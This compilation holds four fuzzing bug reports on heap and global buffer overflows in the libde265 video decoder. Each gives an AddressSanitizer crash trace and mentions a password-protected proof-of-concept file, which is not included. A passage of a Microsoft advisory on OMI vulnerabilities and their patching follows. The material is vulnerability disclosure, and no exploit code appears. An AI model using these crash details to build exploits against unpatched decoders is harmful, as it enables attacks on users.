libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file.

**heap-buffer-overflow in put\_weighted\_bipred\_16\_fallback when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-put_weighted_bipred_16_fallback-heap_overflow.crash
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: pps header invalid
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    =================================================================
    ==97574==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b00001b510 at pc 0x000000432ac8 bp 0x7ffe6664b0a0 sp 0x7ffe6664b090
    WRITE of size 2 at 0x62b00001b510 thread T0
        #0 0x432ac7 in put_weighted_bipred_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:223
        #1 0x52beeb in acceleration_functions::put_weighted_bipred(void*, long, short const*, short const*, long, int, int, int, int, int, int, int, int) const ../libde265/acceleration.h:286
        #2 0x52112f in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:562
        #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107
        #4 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310
        #5 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #6 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #7 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #8 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #9 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #10 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #11 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #12 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #13 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #14 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #15 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #16 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #17 0x7f349865a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #18 0x402b28 in _start (/root/dec265+0x402b28)
    
    0x62b00001b510 is located 0 bytes to the right of 25360-byte region [0x62b000015200,0x62b00001b510)
    allocated by thread T0 here:
        #0 0x7f349955b076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)
        #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54
        #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132
        #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384
        #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262
        #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012
        #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639
        #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #11 0x7f349865a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:223 put_weighted_bipred_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int, int, int, int, int, int)
    Shadow bytes around the buggy address:
      0x0c567fffb650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c567fffb660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c567fffb670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c567fffb680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c567fffb690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c567fffb6a0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c567fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c567fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c567fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c567fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c567fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==97574==ABORTING
    

**POC file**

libde265-put\_weighted\_bipred\_16\_fallback-heap\_overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21602: heap-buffer-overflow in put_weighted_bipred_16_fallback when decoding file · Issue #242 · strukturag/libde265

libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file.

**heap overflow in de265\_image::available\_zscan when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-de265_image__available_zscan-heap_overflow.crash
    WARNING: pps header invalid
    WARNING: non-existing PPS referenced
    WARNING: pps header invalid
    WARNING: non-existing PPS referenced
    =================================================================
    ==50404==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a0000178bc at pc 0x000000443563 bp 0x7fff14a846d0 sp 0x7fff14a846c0
    READ of size 4 at 0x62a0000178bc thread T0
        #0 0x443562 in de265_image::available_zscan(int, int, int, int) const /root/src/libde265/libde265/image.cc:760
        #1 0x443acf in de265_image::available_pred_blk(int, int, int, int, int, int, int, int, int, int) const /root/src/libde265/libde265/image.cc:796
        #2 0x521fd7 in derive_spatial_merging_candidates(MotionVectorAccess const&, de265_image const*, int, int, int, int, int, unsigned char, int, int, int, PBMotion*, int) /root/src/libde265/libde265/motion.cc:808
        #3 0x525e21 in get_merge_candidate_list_without_step_9(base_context*, slice_segment_header const*, MotionVectorAccess const&, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1467
        #4 0x526732 in derive_luma_motion_merge_mode(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1570
        #5 0x52afb3 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:2029
        #6 0x52b8ae in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2103
        #7 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310
        #8 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #20 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #21 0x402b28 in _start (/root/dec265+0x402b28)
    
    0x62a0000178bc is located 1468 bytes to the right of 20736-byte region [0x62a000012200,0x62a000017300)
    allocated by thread T0 here:
        #0 0x7f4582959532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532)
        #1 0x42447e in __gnu_cxx::new_allocator<int>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104
        #2 0x422d9c in std::allocator_traits<std::allocator<int> >::allocate(std::allocator<int>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491
        #3 0x420d4f in std::_Vector_base<int, std::allocator<int> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170
        #4 0x455ef8 in std::vector<int, std::allocator<int> >::_M_default_append(unsigned long) /usr/include/c++/5/bits/vector.tcc:557
        #5 0x455c0c in std::vector<int, std::allocator<int> >::resize(unsigned long) /usr/include/c++/5/bits/stl_vector.h:676
        #6 0x451598 in pic_parameter_set::set_derived_values(seq_parameter_set const*) /root/src/libde265/libde265/pps.cc:589
        #7 0x450649 in pic_parameter_set::read(bitreader*, decoder_context*) /root/src/libde265/libde265/pps.cc:528
        #8 0x40a562 in decoder_context::read_pps_NAL(bitreader&) /root/src/libde265/libde265/decctx.cc:574
        #9 0x40dc78 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1244
        #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #13 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/image.cc:760 de265_image::available_zscan(int, int, int, int) const
    Shadow bytes around the buggy address:
      0x0c547fffaec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c547fffaf10: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x0c547fffaf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==50404==ABORTING
    

**POC file**

libde265-de265\_image\_\_available\_zscan-heap\_overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21599: heap overflow in de265_image::available_zscan when decoding file · Issue #235 · strukturag/libde265

libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file.

**heap-buffer-overflow in put\_weighted\_pred\_avg\_16\_fallback when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-put_weighted_pred_avg_16_fallback-heap_overflow.crash
    WARNING: pps header invalid
    WARNING: non-existing PPS referenced
    =================================================================
    ==103499==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005310 at pc 0x000000432cd8 bp 0x7ffe393c5a50 sp 0x7ffe393c5a40
    WRITE of size 2 at 0x62a000005310 thread T0
        #0 0x432cd7 in put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:246
        #1 0x52bc12 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:251
        #2 0x52085c in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:513
        #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107
        #4 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137
        #5 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492
        #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #13 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #14 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #15 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #16 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #17 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #18 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #19 0x402b28 in _start (/root/dec265+0x402b28)
    
    0x62a000005310 is located 0 bytes to the right of 20752-byte region [0x62a000000200,0x62a000005310)
    allocated by thread T0 here:
        #0 0x7fa640736076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)
        #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54
        #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132
        #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384
        #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262
        #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012
        #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639
        #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #11 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:246 put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int)
    Shadow bytes around the buggy address:
      0x0c547fff8a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c547fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c547fff8a60: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==103499==ABORTING
    

**POC file**

libde265-put\_weighted\_pred\_avg\_16\_fallback-heap\_overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21600: heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file · Issue #243 · strukturag/libde265

libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file.

**global buffer overflow in decode\_CABAC\_bit when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-decode_CABAC_bit-overflow.crash
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: slice header invalid
    =================================================================
    ==58539==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000054625f at pc 0x0000004fc1cf bp 0x7fffa287c990 sp 0x7fffa287c980
    READ of size 1 at 0x00000054625f thread T0
        #0 0x4fc1ce in decode_CABAC_bit(CABAC_decoder*, context_model*) /root/src/libde265/libde265/cabac.cc:180
        #1 0x46fca1 in decode_cu_skip_flag /root/src/libde265/libde265/slice.cc:1679
        #2 0x4797c7 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4289
        #3 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #4 0x47b53f in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4630
        #5 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #6 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #7 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #8 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #9 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #10 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #11 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #12 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #13 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #14 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #15 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #16 0x7f83f76d982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #17 0x402b28 in _start (/root/dec265+0x402b28)
    
    0x00000054625f is located 31 bytes to the right of global variable 'next_state_MPS' defined in 'cabac.cc:112:22' (0x546200) of size 64
    0x00000054625f is located 1 bytes to the left of global variable 'next_state_LPS' defined in 'cabac.cc:120:22' (0x546260) of size 64
    SUMMARY: AddressSanitizer: global-buffer-overflow /root/src/libde265/libde265/cabac.cc:180 decode_CABAC_bit(CABAC_decoder*, context_model*)
    Shadow bytes around the buggy address:
      0x0000800a0bf0: 00 00 00 01 f9 f9 f9 f9 00 00 00 00 00 02 f9 f9
      0x0000800a0c00: f9 f9 f9 f9 00 00 00 00 00 00 00 00 01 f9 f9 f9
      0x0000800a0c10: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800a0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800a0c30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9
    =>0x0000800a0c40: 00 00 00 00 00 00 00 00 f9 f9 f9[f9]00 00 00 00
      0x0000800a0c50: 00 00 00 00 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
      0x0000800a0c60: 00 04 f9 f9 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9
      0x0000800a0c70: 00 01 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
      0x0000800a0c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000800a0c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==58539==ABORTING
    

**POC file**

libde265-decode\_CABAC\_bit-overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21596: global buffer overflow in decode_CABAC_bit when decoding file · Issue #236 · strukturag/libde265

Last updated on October 5, 2021: See revision history located at the end of the post for changes.
On September 14, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities and one unauthenticated Remote Code Execution (RCE) vulnerability in the Open Management Infrastructure (OMI) framework: CVE-2021-38645, CVE-2021-38649, CVE-2021-38648, and CVE-2021-38647, respectively.

_Last updated on October 5, 2021: See revision history located at the end of the post_ for changes.

On September 14, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities and one unauthenticated Remote Code Execution (RCE) vulnerability in the Open Management Infrastructure (OMI) framework: CVE-2021-38645, CVE-2021-38649, CVE-2021-38648, and CVE-2021-38647, respectively. Open Management Infrastructure (OMI) is an open-source Web-Based Enterprise Management (WBEM) implementation for managing Linux and UNIX systems. Several Azure Virtual Machine (VM) management extensions use this framework to orchestrate configuration management and log collection on Linux VMs. The remote code execution vulnerability only impacts customers using a Linux management solution (on-premises SCOM or Azure Automation State Configuration or Azure Desired State Configuration extension) that enables remote OMI management. Today, we are providing additional guidance and rolling out additional protections within Azure impacted VM management extensions to resolve these issues.

**What versions of OMI are vulnerable?**

All OMI versions below v1.6.8-1 are vulnerable.

**Which PaaS services are affected by the OMI vulnerability?**

For any PaaS service offerings that use the vulnerable VM extensions for Linux as part of the default service offering, Microsoft has updated the extensions on the affected VM’s transparently for customers. Where customers have installed OMI or any of the extensions on their Azure VMs or on-premises machines, they are required to follow the guidance as provided in table below.

**How can I determine which VMs are impacted by these vulnerabilities?**

VMs that use the VM Management Extensions listed below are impacted. All customers that are impacted will be notified directly.

To identify the affected VMs in their subscriptions, customers can use one the following:

*   Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech Community
*   To identify an Azure VM for the vulnerable extensions, leverage Azure Portal or Azure CLI as described in this article. If the reported extension versions are matching the versions listed for the ‘Fixed Extension Versions’ in below table, no further action is required.
*   To scan an Azure subscription for vulnerable VM’s use the script here. This script can also be used to patch the affected VMs using the upgradeOMI parameter.

**What can I do to protect against these vulnerabilities?**

**Extension updates:** Customers must update vulnerable extensions for their cloud and on-premises deployments as per the table below. New VMs in a region are protected from these vulnerabilities as they are created. For cloud deployments, Microsoft has deployed the updates to extensions across Azure regions. The automatic extension updates were transparently patched without a reboot. Where possible, customers should ensure that automatic extension updates are enabled. Please see Automatic Extension Upgrade for VMs and Scale Sets in Azure to evaluate the configuration of automatic updates.

